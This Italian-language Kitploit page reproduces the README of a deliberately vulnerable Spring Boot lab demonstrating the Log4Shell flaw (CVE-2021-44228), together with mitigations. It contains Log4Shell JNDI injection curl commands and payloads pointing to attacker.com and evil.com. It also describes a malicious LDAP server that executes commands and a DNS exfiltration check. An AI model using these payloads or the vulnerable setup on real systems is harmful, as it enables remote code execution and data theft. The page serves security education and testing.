Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
log4j2-bugmaker — Demo of CVE-2021-44228 Log4Shell. | Kitploit
Strumenti/GitHubGitHub/mintimate/log4j2-bugmaker
Vulnerability AnalysisExploitationWeb Application ExploitationLearning & EducationRemote Access ToolLabs & Practice
GitHubmintimate/log4j2-bugmaker

log4j2-bugmaker

Demo of CVE-2021-44228 Log4Shell.

Vedi Repository
9 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Log4j2-BugMaker

Progetto dimostrativo della vulnerabilità CVE-2021-44228 Log4Shell

Questo è un progetto demo per apprendere e ricercare la vulnerabilità di esecuzione remota di codice di Log4j2 (Log4Shell).

⚠️ Avviso di sicurezza

Questo progetto è destinato esclusivamente a scopi di ricerca sulla sicurezza e formazione: non utilizzarlo in ambienti di produzione!

Questo progetto utilizza la versione Log4j 2.14.1, affetta da gravi vulnerabilità di sicurezza.

📋 Configurazione dell'ambiente

  • Spring Boot: 2.6.1
  • Log4j2: 2.14.1 (versione vulnerabile)
  • Java: 8 (JDK 1.8)

🚀 Avvio rapido

1. Compilare il progetto

root@kitploit:~
./mvnw clean package

2. Eseguire l'applicazione

root@kitploit:~
./mvnw spring-boot:run

Oppure:

root@kitploit:~
java -jar target/log4j2-bugmaker-0.0.1-SNAPSHOT.jar

3. Accedere all'applicazione

Aprire il browser e visitare: http://localhost:8080

🎯 Endpoint vulnerabili

1. Iniezione nell'header User-Agent

root@kitploit:~
curl -H "User-Agent: \${jndi:ldap://attacker.com/a}" http://localhost:8080/api/log

2. Iniezione nei parametri di query

root@kitploit:~
curl "http://localhost:8080/api/search?query=\${jndi:ldap://attacker.com/a}"

3. Health check (non vulnerabile)

root@kitploit:~
curl http://localhost:8080/api/health

💡 Principio della vulnerabilità

Log4Shell (CVE-2021-44228) è una grave vulnerabilità in Apache Log4j2. Quando l'applicazione registra input utente contenenti stringhe di formato speciali, Log4j2 analizza le espressioni di lookup JNDI; un attaccante può sfruttare questa funzionalità per eseguire codice remoto.

Esempi di payload d'attacco

root@kitploit:~
${jndi:ldap://evil.com/a}
${jndi:rmi://evil.com/a}
${jndi:dns://evil.com/a}

Payload di test (sicuri)

root@kitploit:~
${java:version}
${java:os}
${env:PATH}

🔧 Passaggi per il test

  1. Avviare l'applicazione
  2. Inviare una richiesta contenente un'espressione JNDI
  3. Controllare i log della console e osservare il comportamento di parsing di Log4j2

🛡️ Soluzioni di mitigazione

Soluzione 1: aggiornare la versione di Log4j2

Aggiornare Log4j2 alla versione 2.17.1 o successiva:

root@kitploit:~
<properties>
    <log4j2.version>2.17.1</log4j2.version>
</properties>

Soluzione 2: impostare i parametri JVM

root@kitploit:~
-Dlog4j2.formatMsgNoLookups=true

Soluzione 3: rimuovere la classe JndiLookup

root@kitploit:~
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

🚀 Demo di esecuzione remota di codice

Metodo 1: utilizzare lo strumento fornito (consigliato)

root@kitploit:~
# 1. 运行自动化脚本
./setup-exploit-server.sh

# 2. 选择 JNDI-Injection-Exploit 工具
# 3. 输入要执行的命令(如 whoami 或 cat /etc/hosts)
# 4. 在另一个终端发送攻击载荷

Metodo 2: utilizzare il server LDAP Python

root@kitploit:~
# 启动恶意 LDAP 服务器
python3 simple-ldap-server.py "whoami"

# 或执行其他命令
python3 simple-ldap-server.py "cat /etc/hosts"

# 在另一个终端发送攻击载荷
curl -H 'User-Agent: ${jndi:ldap://YOUR_IP:1389/Exploit}' http://localhost:8080/api/log

Metodo 3: verifica dell'exfiltrazione DNS (senza allestire un server)

root@kitploit:~
# 运行 DNS 外带测试脚本
./test-dns-exfiltration.sh

# 按提示操作,访问 dnslog.cn 获取子域名
# 然后查看是否收到 DNS 查询请求

📚 Riferimenti

  • Dettagli CVE-2021-44228
  • Bollettino di sicurezza Apache Log4j
  • Avviso CISA
  • JNDI-Injection-Exploit
  • JNDIExploit

📝 Licenza

Questo progetto è distribuito con licenza open source MIT License.

Nota speciale: questo progetto è destinato esclusivamente a scopi educativi e di ricerca sulla sicurezza; l'utente si assume ogni rischio derivante dall'utilizzo.

⚠️ Dichiarazione legale

Eseguire test di penetrazione su sistemi altrui senza autorizzazione è illegale! Questo progetto è destinato esclusivamente a:

  • Apprendere nel proprio ambiente di test
  • Test di sicurezza autorizzati
  • Ricerca sulla sicurezza e scopi educativi

Si prega di rispettare le leggi e le normative locali e di utilizzare queste conoscenze in modo responsabile.

Scarica lo strumento